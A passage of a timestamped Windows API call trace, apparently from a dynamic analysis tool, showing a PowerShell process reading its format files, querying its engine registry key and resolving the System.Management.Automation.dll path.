	[0527.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0527.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0527.718] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xd3f757cf, Data2=0xdebd, Data3=0x4abc, Data4=([0]=0x82, [1]=0x5, [2]=0x55, [3]=0x69, [4]=0x63, [5]=0x3f, [6]=0xdc, [7]=0x8a))) returned 0x0
	[0527.718] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc18b5372, Data2=0xa1cd, Data3=0x4578, Data4=([0]=0x83, [1]=0xad, [2]=0x4a, [3]=0x25, [4]=0xab, [5]=0x5c, [6]=0xc2, [7]=0x1f))) returned 0x0
	[0527.718] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x7bd9654a, Data2=0x183c, Data3=0x40e8, Data4=([0]=0xaa, [1]=0xac, [2]=0x35, [3]=0x29, [4]=0x2f, [5]=0x4c, [6]=0xef, [7]=0x27))) returned 0x0
	[0527.718] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xe00a817b, Data2=0x2bde, Data3=0x4f78, Data4=([0]=0x81, [1]=0x77, [2]=0x11, [3]=0xc5, [4]=0xff, [5]=0xdf, [6]=0xa5, [7]=0x9c))) returned 0x0
	[0527.718] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0527.719] GetFileType (hFile=0x2dc) returned 0x1
	[0527.719] SetErrorMode (uMode=0x1) returned 0x1
	[0527.719] GetFileType (hFile=0x2dc) returned 0x1
	[0527.719] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.719] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.719] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.719] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.719] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.720] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.720] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.720] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.721] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.721] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.721] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.721] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.722] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.722] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.722] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.722] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.723] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.723] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.723] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.724] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.724] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.724] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.724] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.725] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.725] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.725] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.725] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.725] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.726] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.726] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.733] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.733] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.977] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.977] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.978] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.978] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.978] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.978] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.978] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.979] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.979] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.979] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.979] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.980] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.980] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.980] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.980] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.980] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.981] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.981] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.981] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.982] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.982] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.982] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.983] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.983] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.983] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.983] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.984] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.984] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.984] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.984] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0528.985] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0xf37, lpOverlapped=0x0) returned 1
	[0528.985] ReadFile (in: hFile=0x2dc, lpBuffer=0x34301bf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x34301bf*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0528.985] ReadFile (in: hFile=0x2dc, lpBuffer=0x3430b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3430b20*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0528.986] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x2dc) returned 0x0
	[0528.986] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0528.986] CoTaskMemAlloc (cb=0x5a) returned 0x3eaa40
	[0528.986] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x3eaa40, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0528.986] CoTaskMemFree (pv=0x3eaa40) 
	[0528.986] RegCloseKey (hKey=0x2dc) returned 0x0
	[0528.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0528.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0528.999] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x2775fd2, Data2=0xa3c, Data3=0x4613, Data4=([0]=0x84, [1]=0xa9, [2]=0x20, [3]=0xca, [4]=0x12, [5]=0x0, [6]=0xb6, [7]=0xe1))) returned 0x0
	[0529.000] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x871419f7, Data2=0xe3da, Data3=0x4bc2, Data4=([0]=0xa4, [1]=0xd1, [2]=0xec, [3]=0x70, [4]=0x6b, [5]=0x6d, [6]=0xc2, [7]=0x21))) returned 0x0
	[0529.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0529.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0529.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0529.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.156] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x301cda5b, Data2=0xfe2f, Data3=0x4775, Data4=([0]=0x8a, [1]=0x8f, [2]=0xbb, [3]=0x90, [4]=0x57, [5]=0xbb, [6]=0x29, [7]=0xc8))) returned 0x0
	[0531.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
